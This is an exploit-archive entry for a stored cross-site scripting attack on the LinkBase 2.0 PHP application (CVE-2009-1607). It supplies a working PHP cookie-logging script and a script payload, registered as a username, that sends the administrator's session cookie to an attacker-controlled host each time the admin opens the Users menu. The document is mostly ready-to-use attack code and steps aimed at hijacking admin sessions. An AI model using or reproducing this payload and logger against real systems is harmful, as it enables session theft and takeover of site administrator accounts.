LinkBase 2.0 - Remote Cookie Grabber

Author: SirGod
type: webapps
platform: php
port: 
date_added: 2009-05-04 
date_updated:  
verified: 1 
codes: OSVDB-54417;CVE-2009-1607 
tags: 
aliases:  
screenshot_url:  
application_url: 

#################################################################################################################
[+] Download LinkBase 2.0 Cookie Grabber Exploit
[+] Discovered By SirGod
[+] www.mortal-team.net
[+] www.h4cky0u.org
[+] Greetz : All my friends
#################################################################################################################

[+] Make 2 files and upload to your host :

  stealer.php  - > Put the following code into the file :

<?php
$cookie = $_GET['cookie'];
$log = fopen("log.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>

  log.txt   - > CHMOD it 777 and put in the same directory with stealer.php

[+] Register as :

  <script>document.location ="http://[YOUR_HOST]/[path]/stealer.php?cookie=" + document.cookie;</script>

  Every time the admin will visit the "Users" menu from admin panel he will be redirected to your cookie stealer.

#################################################################################################################

# milw0rm.com [2009-05-05]